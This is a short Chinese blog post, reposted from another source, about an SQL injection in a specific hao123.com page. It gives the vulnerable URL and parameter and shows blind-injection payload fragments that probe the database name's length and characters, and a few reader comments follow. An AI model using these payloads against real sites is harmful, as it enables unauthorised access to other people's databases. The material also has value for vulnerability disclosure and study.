adwin's blog
hao123—Sql Injection[from f4ck]
post by:adwin 2012-2-7 21:22
SO。。。刚刚在传说中的乌云漏洞提交平台看到有人贴出的hao123 的 Sql Injection 。
我就不存档了 存着也不会有妹子出来。 拿出来发了 不知道那位老兄报的是不是这个点。
target:
http://www.hao123.com/friends/index_blessing.php?id=2608
基本判定是 Integer 型
union select 1,2,3,4,.................无果.
于是乎:盲注
//判断数据库的长度

Length((database()))=?+and+'x'='x

ascii(substring((database()),2,1))=数字+and+'x'='x
......
盲注纯属体力活..相信大家都会.
我们直接跑工具.
看兵器:
点击查看原图

 

此文纯属聊天扯蛋.

评论:
undsen
2012-02-07 21:51 回复
博主可以啊。。。
adwin
2012-02-08 11:10 回复
@undsen:= =,转的。
往事
2012-07-03 14:58 回复
你吓到我了
adwin
2012-07-03 16:11 回复
@往事:= =,转载而已。
发表评论:
昵称

邮件地址 (选填)

个人主页 (选填)

内容